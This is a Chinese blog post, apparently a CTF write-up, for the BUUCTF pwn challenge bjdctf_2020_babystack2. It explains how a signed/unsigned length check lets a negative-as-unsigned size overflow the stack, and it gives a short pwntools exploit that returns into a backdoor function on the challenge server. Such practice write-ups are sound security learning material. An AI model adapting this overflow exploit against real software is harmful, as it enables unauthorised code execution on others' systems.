BUUCTF-PWN-bjdctf_2020_babystack2

发表于2022-01-28|更新于2022-01-28|CTF

|阅读量:|评论数:

BUUCTF-PWN-bjdctf_2020_babystack2

checksec

IDA

有两个输入点，先输入nbytes，如果nbytes不大于10，那么可以输入buf，但buf的长度由nbytes大小决定

这题的知识点在于nbytes前后的数据类型是不同的，两个都是8位，但signed int的第一位代表正负，而unsigned int不带符号，所以可以利用这个漏洞，将可输入长度扩大到可以利用的范围，如下图：

80000010在signed int中是个负数，但在unsigned int中等于十进制的2147483664，足够我们进行溢出

此外，我们还发现一个后门函数：

EXP

from pwn import *

p = remote('node4.buuoj.cn', 28327)

payload = b'a' * (0x10 + 0x8) + p64(0x400726)

p.sendlineafter('name:\n', '2147483664')
p.sendlineafter('name?\n', payload)
p.interactive()

结果

文章作者: icvuln

文章链接: https://lht.wiki/20220128-ctf-b2b2/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Clerk.Max(well);！

打赏

wechat
alipay

相关推荐

CTFHUB-PWN-ret2text

XCTF-PWN-反应釜开关控制

CTFHUB-PWN-ret2shellcode

XCTF-PWN-实时数据监测

BUUCTF-PWN-warmup_csaw_2016

评论

本地搜索